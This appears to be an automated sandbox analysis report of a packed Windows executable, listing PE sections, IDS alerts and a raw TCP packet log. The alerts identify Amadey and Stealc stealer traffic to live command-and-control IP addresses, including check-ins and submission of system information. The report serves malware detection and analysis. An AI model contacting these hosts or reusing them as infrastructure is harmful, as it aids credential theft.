IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x16200	a441d5553bb88a5df825982edab979e9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x2b0	0x200	a1a81d42439a511485a8956a31bea5d5	False	0.794921875	data	6.039849957875539	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x2b1000	0x200	cf7100b08921396e938ca7d46718b46e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qttzyszk	0x4fd000	0x1a6000	0x1a5800	3569359c0877c44f9ece9d252ecce756	False	0.9946879865435944	data	7.953435287157856	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kydeomrz	0x6a3000	0x1000	0x600	a758c12d31c74d37851a4e90c2620745	False	0.5546875	data	4.890115170364101	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x6a4000	0x3000	0x2200	816343017d651736dc46c59fefddcf86	False	0.06215533088235294	DOS executable (COM)	0.7135981903686534	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x6a2584	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-23T07:09:04.092640+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.6	56488	TCP
2024-11-23T07:09:15.554629+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49717	185.215.113.206	80	TCP
2024-11-23T07:09:15.996127+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.6	49717	185.215.113.206	80	TCP
2024-11-23T07:09:16.117116+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.6	49717	TCP
2024-11-23T07:09:16.437538+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.6	49717	185.215.113.206	80	TCP
2024-11-23T07:09:16.558782+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.6	49717	TCP
2024-11-23T07:09:17.969053+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.6	49717	185.215.113.206	80	TCP
2024-11-23T07:09:18.771114+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49717	185.215.113.206	80	TCP
2024-11-23T07:09:41.226869+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:43.291915+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:44.633834+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:45.932449+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:49.672517+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:50.824547+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49817	185.215.113.206	80	TCP
2024-11-23T07:09:56.551524+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49944	185.215.113.16	80	TCP
2024-11-23T07:11:06.444510+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.6	56481	185.215.113.43	80	TCP
2024-11-23T07:11:10.979191+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	56493	31.41.244.11	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 07:09:04.092639923 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.092665911 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.092729092 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.092745066 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.092763901 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.092762947 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.092834949 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.095474958 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.095552921 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.095602036 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.103879929 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.103948116 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.103977919 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.112250090 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.112313032 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.134078979 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.134135008 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.253710032 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.253762007 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.253886938 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.253899097 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.660007000 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.660047054 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.660151958 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.664077044 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.664176941 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.664228916 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.670672894 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.670787096 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.670835018 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.679235935 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.679404020 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.679459095 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.687664032 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.687680960 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.687736988 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.696094990 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.717305899 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.717377901 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.739732981 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:04.836909056 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.836925030 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.837079048 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:04.837090969 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.303883076 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.303924084 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.304019928 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:05.306261063 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.306374073 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.306427956 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:05.314672947 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.314780951 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.314835072 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:05.323080063 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.323198080 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.323266983 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:05.331471920 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.331557989 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.331621885 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:05.339916945 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.380333900 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:05.473077059 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:05.473176003 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:05.501890898 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:05.501929045 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:05.592935085 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.592955112 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.593007088 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.593099117 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.593183994 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.621454954 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.621489048 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.621532917 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.621611118 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.621623039 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.989095926 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.989296913 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.989401102 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:05.993258953 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.993381023 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:05.993438005 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.001775980 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.001884937 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.001951933 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.010257959 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.010413885 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.010489941 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.018807888 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.018888950 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.018950939 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.048525095 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.048618078 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.048721075 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.052623034 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.052757978 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.052876949 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.061235905 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.061374903 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.061456919 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.069408894 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.069528103 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.069638968 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.077816963 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.077876091 CET	443	49709	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.077948093 CET	49709	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.094064951 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.094131947 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.213661909 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.213718891 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.213754892 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.213768005 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.213782072 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.246365070 CET	49711	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:06.246476889 CET	443	49711	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:06.246556997 CET	49711	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:06.247152090 CET	49711	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:06.247190952 CET	443	49711	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:06.525851011 CET	49712	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:06.525932074 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:06.525971889 CET	443	49712	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:06.525979042 CET	443	49713	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:06.526073933 CET	49712	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:06.526093006 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:06.527607918 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:06.527621984 CET	443	49713	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:06.527674913 CET	49712	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:06.527713060 CET	443	49712	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:06.674139977 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.674223900 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.674345016 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.678356886 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.678463936 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.678561926 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.686866045 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.686964035 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.687047005 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.695326090 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.695436001 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.695486069 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.703813076 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.703912020 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.703988075 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.727202892 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.727262974 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.727503061 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.727605104 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.727686882 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.727844000 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:06.727849960 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.846821070 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.846852064 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.846904039 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.846980095 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:06.847033024 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:07.396884918 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:07.396970987 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:07.397021055 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:07.401089907 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:07.401199102 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:07.401248932 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:07.409605026 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:07.409703970 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:07.409751892 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:07.417696953 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:07.417787075 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:07.417838097 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:07.426176071 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:07.426263094 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:07.426306963 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:08.161583900 CET	49673	443	192.168.2.6	173.222.162.64
Nov 23, 2024 07:09:08.161592960 CET	49674	443	192.168.2.6	173.222.162.64
Nov 23, 2024 07:09:08.326685905 CET	443	49712	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.326798916 CET	49712	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.353041887 CET	49712	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.353069067 CET	443	49712	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.353190899 CET	443	49713	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.353291988 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.353511095 CET	443	49712	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.353599072 CET	49712	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.354954958 CET	49712	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.354998112 CET	443	49712	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.355381966 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.355397940 CET	443	49713	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.355561972 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.355571985 CET	443	49713	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.356184006 CET	443	49713	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.356256008 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.474102974 CET	49672	443	192.168.2.6	173.222.162.64
Nov 23, 2024 07:09:08.626940966 CET	443	49711	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:08.627024889 CET	49711	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:08.631223917 CET	49711	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:08.631247044 CET	443	49711	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:08.631717920 CET	443	49711	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:08.634084940 CET	49711	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:08.634253979 CET	49711	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:08.634268999 CET	443	49711	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:08.634371042 CET	49711	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:08.636152983 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:08.636235952 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:08.648787022 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:08.648808002 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:08.649209976 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:08.649672985 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:08.649672985 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:08.649709940 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:08.679342031 CET	443	49711	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:08.870970011 CET	443	49712	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.870999098 CET	443	49712	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.871052027 CET	49712	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.871079922 CET	443	49712	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.871098995 CET	49712	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.871109962 CET	443	49712	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.871153116 CET	49712	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.872536898 CET	49712	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.872555971 CET	443	49712	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.922363043 CET	443	49713	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.922434092 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.922457933 CET	443	49713	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.922507048 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.922518015 CET	443	49713	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.922574997 CET	443	49713	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:08.922606945 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.922636032 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.923130035 CET	49713	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:08.923182011 CET	443	49713	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:09.194072008 CET	443	49711	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:09.194165945 CET	443	49711	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:09.194318056 CET	49711	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:09.194562912 CET	49711	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:09.194606066 CET	443	49711	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:09.332537889 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:09.332606077 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:09.332645893 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:09.332695961 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:09.332717896 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:09.332751989 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:09.333142996 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:09.333251953 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:09.333484888 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:09.333578110 CET	443	49714	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:09.333659887 CET	49714	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:12.151842117 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:12.151882887 CET	443	49715	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:12.151938915 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:12.153131008 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:12.153146029 CET	443	49715	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:12.720897913 CET	49716	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:12.721029043 CET	443	49716	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:12.721113920 CET	49716	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:12.721704960 CET	49716	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:12.721745968 CET	443	49716	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:13.582310915 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:13.702534914 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:13.702615023 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:13.703495979 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:13.822921038 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:14.357472897 CET	443	49715	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:14.357604027 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:14.393944979 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:14.393969059 CET	443	49715	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:14.394347906 CET	443	49715	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:14.442886114 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:14.603995085 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:14.604074955 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:14.604087114 CET	443	49715	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:14.604367971 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:14.647372961 CET	443	49715	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:14.930679083 CET	443	49716	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:14.930779934 CET	49716	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:14.966001987 CET	49716	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:14.966062069 CET	443	49716	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:14.966425896 CET	443	49716	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:14.967911005 CET	49716	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:14.967978954 CET	49716	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:14.967998028 CET	443	49716	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:14.968080997 CET	49716	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:15.011336088 CET	443	49716	20.198.118.190	192.168.2.6
